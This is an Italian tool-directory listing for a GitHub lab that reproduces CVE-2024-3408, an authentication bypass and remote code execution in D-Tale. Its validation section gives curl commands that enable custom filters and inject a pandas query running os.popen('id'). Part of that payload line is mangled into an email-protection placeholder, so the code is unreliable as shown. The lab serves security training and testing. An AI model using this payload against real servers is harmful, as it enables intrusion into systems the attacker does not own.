Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3408-dtale — Laboratorio di vulnerabilità per CVE-2024-3408 - D-Tale Bypass dell'autenticazione e RCE | Kitploit
Strumenti/GitHubGitHub/flame-11/cve-2024-3408-dtale
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubflame-11/cve-2024-3408-dtale

CVE-2024-3408-dtale

Laboratorio di vulnerabilità per CVE-2024-3408 - D-Tale Bypass dell'autenticazione e RCE

Vedi Repository
28 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3408 - Bypass dell'autenticazione e RCE in D-Tale

Ambiente di laboratorio riproducibile per CVE-2024-3408, una vulnerabilità di bypass dell'autenticazione ed esecuzione remota di codice in D-Tale.

Vulnerabilità

Le versioni di D-Tale fino alla 3.15.1 sono vulnerabili a causa di:

  1. SECRET_KEY hardcoded ("Dtale") per la firma delle sessioni Flask - consente la falsificazione dei cookie di sessione
  2. Esecuzione di codice tramite filtri personalizzati - l'endpoint test-filter utilizza una query pandas che può essere abusata per eseguire codice Python arbitrario

CVSS: 9.8 (Critico)
Affetti: D-Tale <= 3.15.1

Avvio rapido

root@kitploit:~
docker compose up -d --build

D-Tale sarà disponibile su http://localhost:40000

Validazione

root@kitploit:~
# Step 1: Enable custom filters curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D" # Expected: {"success":true} # Step 2: Execute command via pandas query injection curl -s -G "http://localhost:40000/dtale/test-filter/1" \ --data-urlencode "[email protected].__import__('os').popen('id').read()" # Expected: Response contains "uid=" and "gid=" (command output in error message)

Pulizia

root@kitploit:~
docker compose down

Riferimenti

  • Huntr Report (CVE-2024-3408)
  • Huntr Report (CVE-2025-0655)
  • NVD
  • D-Tale GitHub

Dichiarazione di non responsabilità

Questo laboratorio è solo a scopo educativo e per test di sicurezza autorizzati. Non utilizzarlo su sistemi di cui non sei proprietario o per i quali non hai il permesso di test.

Scarica lo strumento